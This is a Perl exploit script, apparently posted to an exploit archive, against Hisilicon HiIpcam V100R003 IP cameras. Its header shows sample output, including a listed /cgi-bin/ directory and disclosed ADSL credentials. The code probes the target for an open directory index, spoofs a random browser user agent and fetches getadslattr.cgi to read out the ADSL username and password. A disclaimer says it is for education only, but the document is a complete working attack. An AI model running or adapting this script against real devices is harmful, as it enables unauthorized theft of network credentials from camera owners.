Share
#!/usr/bin/perl -w  
#  
# Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure  
#  
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>  
#  
#  
# # [   
# # [ Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure  
# # [ =============================================================  
# # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>  
# # [  
# # [ Disclaimer:  
# # [ This or previous programs are for Educational purpose  
# # [ ONLY. Do not use it without permission. The usual   
# # [ disclaimer applies, especially the fact that Todor Donev  
# # [ is not liable for any damages caused by direct or   
# # [ indirect use of the information or functionality provided  
# # [ by these programs. The author or any Internet provider   
# # [ bears NO responsibility for content or misuse of these   
# # [ programs or any derivatives thereof. By using these programs   
# # [ you accept the fact that any damage (dataloss, system crash,   
# # [ system compromise, etc.) caused by the use of these programs  
# # [ are not Todor Donev's responsibility.  
# # [   
# # [ Use them at your own risk!  
# # [  
# # [ Initializing the browser  
# # [ Server: thttpd/2.25b 29dec2003  
# # [ The target is vulnerable  
# # [  
# # [ Directory Traversal  
# # [  
# # [ /cgi-bin/..  
# # [ /cgi-bin/adsl_init.cgi  
# # [ /cgi-bin/chkwifi.cgi  
# # [ /cgi-bin/ddns_start.cgi  
# # [ /cgi-bin/getadslattr.cgi  
# # [ /cgi-bin/getddnsattr.cgi  
# # [ /cgi-bin/getinetattr.cgi  
# # [ /cgi-bin/getinterip.cgi  
# # [ /cgi-bin/getnettype.cgi  
# # [ /cgi-bin/getupnp.cgi  
# # [ /cgi-bin/getwifi.cgi  
# # [ /cgi-bin/getwifiattr.cgi  
# # [ /cgi-bin/ptzctrldown.cgi  
# # [ /cgi-bin/ptzctrlleft.cgi  
# # [ /cgi-bin/ptzctrlright.cgi  
# # [ /cgi-bin/ptzctrlup.cgi  
# # [ /cgi-bin/ptzctrlzoomin.cgi  
# # [ /cgi-bin/ptzctrlzoomout.cgi  
# # [ /cgi-bin/ser.cgi  
# # [ /cgi-bin/setadslattr.cgi  
# # [ /cgi-bin/setddnsattr.cgi  
# # [ /cgi-bin/setinetattr.cgi  
# # [ /cgi-bin/setwifiattr.cgi  
# # [ /cgi-bin/testwifi.cgi  
# # [ /cgi-bin/upnp_start.cgi  
# # [ /cgi-bin/upnp_stop.cgi  
# # [ /cgi-bin/wifi_start.cgi  
# # [ /cgi-bin/wifi_stop.cgi  
# # [   
# # [ File Reading  
# # [  
# # [ var ip = "" ;  
# # [ var adslenable = "" ;  
# # [ var username = "hacker" ;  
# # [ var password = "133337" ;  
# # [ var dnsauto = "1" ;  
# # [ var dns1 = "8.8.8.8" ;  
# # [ var dns2 = "8.8.4.4" ;  
#  
#   
use strict;  
use HTTP::Request;  
use LWP::UserAgent;  
use WWW::UserAgent::Random;  
use HTML::TreeBuilder;  
$| = 1;  
my $host = shift || 'https://192.168.1.1/'; # Full path url to the store  
print "\033[2J"; #clear the screen  
print "\033[0;0H"; #jump to 0,0  
  
my $banner = "\x5b\x20\x0a\x5b\x20\x48\x69\x73\x69\x6c\x69\x63\x6f\x6e\x20\x48\x69\x49\x70\x63\x61\x6d\x20\x56\x31\x30\x30\x52\x30\x30\x33\x20\x52\x65\x6d\x6f\x74\x65\x20\x41\x44\x53\x4c\x20\x43\x72\x65\x64\x65\x6e\x74\x69\x61\x6c\x73\x20\x44\x69\x73\x63\x6c\x6f\x73\x75\x72\x65\x0a\x5b\x20\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x5b\x20\x45\x78\x70\x6c\x6f\x69\x74\x20\x41\x75\x74\x68\x6f\x72\x3a\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x20\x32\x30\x31\x39\x20\x3c\x74\x6f\x64\x6f\x72\x2e\x64\x6f\x6e\x65\x76\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x3e\x0a\x5b\x0a\x5b\x20\x20\x44\x69\x73\x63\x6c\x61\x69\x6d\x65\x72\x3a\x0a\x5b\x20\x20\x54\x68\x69\x73\x20\x6f\x72\x20\x70\x72\x65\x76\x69\x6f\x75\x73\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x61\x72\x65\x20\x66\x6f\x72\x20\x45\x64\x75\x63\x61\x74\x69\x6f\x6e\x61\x6c\x20\x70\x75\x72\x70\x6f\x73\x65\x0a\x5b\x20\x20\x4f\x4e\x4c\x59\x2e\x20\x44\x6f\x20\x6e\x6f\x74\x20\x75\x73\x65\x20\x69\x74\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x70\x65\x72\x6d\x69\x73\x73\x69\x6f\x6e\x2e\x20\x54\x68\x65\x20\x75\x73\x75\x61\x6c\x20\x0a\x5b\x20\x20\x64\x69\x73\x63\x6c\x61\x69\x6d\x65\x72\x20\x61\x70\x70\x6c\x69\x65\x73\x2c\x20\x65\x73\x70\x65\x63\x69\x61\x6c\x6c\x79\x20\x74\x68\x65\x20\x66\x61\x63\x74\x20\x74\x68\x61\x74\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x0a\x5b\x20\x20\x69\x73\x20\x6e\x6f\x74\x20\x6c\x69\x61\x62\x6c\x65\x20\x66\x6f\x72\x20\x61\x6e\x79\x20\x64\x61\x6d\x61\x67\x65\x73\x20\x63\x61\x75\x73\x65\x64\x20\x62\x79\x20\x64\x69\x72\x65\x63\x74\x20\x6f\x72\x20\x0a\x5b\x20\x20\x69\x6e\x64\x69\x72\x65\x63\x74\x20\x75\x73\x65\x20\x6f\x66\x20\x74\x68\x65\x20\x20\x69\x6e\x66\x6f\x72\x6d\x61\x74\x69\x6f\x6e\x20\x6f\x72\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x61\x6c\x69\x74\x79\x20\x70\x72\x6f\x76\x69\x64\x65\x64\x0a\x5b\x20\x20\x62\x79\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x2e\x20\x54\x68\x65\x20\x61\x75\x74\x68\x6f\x72\x20\x6f\x72\x20\x61\x6e\x79\x20\x49\x6e\x74\x65\x72\x6e\x65\x74\x20\x70\x72\x6f\x76\x69\x64\x65\x72\x20\x0a\x5b\x20\x20\x62\x65\x61\x72\x73\x20\x4e\x4f\x20\x72\x65\x73\x70\x6f\x6e\x73\x69\x62\x69\x6c\x69\x74\x79\x20\x66\x6f\x72\x20\x63\x6f\x6e\x74\x65\x6e\x74\x20\x6f\x72\x20\x6d\x69\x73\x75\x73\x65\x20\x6f\x66\x20\x74\x68\x65\x73\x65\x20\x0a\x5b\x20\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x6f\x72\x20\x61\x6e\x79\x20\x64\x65\x72\x69\x76\x61\x74\x69\x76\x65\x73\x20\x74\x68\x65\x72\x65\x6f\x66\x2e\x20\x42\x79\x20\x75\x73\x69\x6e\x67\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x0a\x5b\x20\x20\x79\x6f\x75\x20\x61\x63\x63\x65\x70\x74\x20\x74\x68\x65\x20\x66\x61\x63\x74\x20\x74\x68\x61\x74\x20\x61\x6e\x79\x20\x64\x61\x6d\x61\x67\x65\x20\x28\x64\x61\x74\x61\x6c\x6f\x73\x73\x2c\x20\x73\x79\x73\x74\x65\x6d\x20\x63\x72\x61\x73\x68\x2c\x20\x0a\x5b\x20\x20\x73\x79\x73\x74\x65\x6d\x20\x63\x6f\x6d\x70\x72\x6f\x6d\x69\x73\x65\x2c\x20\x65\x74\x63\x2e\x29\x20\x63\x61\x75\x73\x65\x64\x20\x62\x79\x20\x74\x68\x65\x20\x75\x73\x65\x20\x20\x6f\x66\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x0a\x5b\x20\x20\x61\x72\x65\x20\x6e\x6f\x74\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x27\x73\x20\x72\x65\x73\x70\x6f\x6e\x73\x69\x62\x69\x6c\x69\x74\x79\x2e\x0a\x5b\x20\x20\x20\x0a\x5b\x20\x55\x73\x65\x20\x74\x68\x65\x6d\x20\x61\x74\x20\x79\x6f\x75\x72\x20\x6f\x77\x6e\x20\x72\x69\x73\x6b\x21\x0a\x5b\x0a";  
  
print $banner;  
  
print "[ e.g. perl $0 https://target:port/\n" and exit if ($host !~ m/^http/);  
print "[ Initializing the browser\n";  
my $user_agent = rand_ua("browsers");  
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });  
$browser->timeout(30);  
$browser->agent($user_agent);  
my $target = $host."/cgi-bin/";  
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);   
my $response = $browser->request($request) or die "[ Exploit Failed: $!";  
print "[ 401 Unauthorized!\n" and exit if ($response->code eq '401');  
print "[ Server: ", $response->header('Server'), "\n";  
if (defined ($response->as_string()) && ($response->as_string() =~ m/<H2>Index of \/cgi-bin\/<\/H2>/)){  
print "[ The target is vulnerable\n";  
print "[\n[ Directory Traversal\n";  
my $tree = HTML::TreeBuilder->new_from_content($response->as_string());  
my @files = $tree->look_down(_tag => 'a');  
print "[ ", $_->attr('href'), "\n" for @files;  
my $target = $host."/cgi-bin/getadslattr.cgi";  
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);  
my $response = $browser->request($request) or die "[ Exploit Failed: $!";  
print "[\n[ File Reading\n";  
print "[ ", $_, "\n" for split(/\n/,$response->content());  
  
} else {   
print "[ Exploit failed! The target isn't vulnerable\n";  
exit;  
}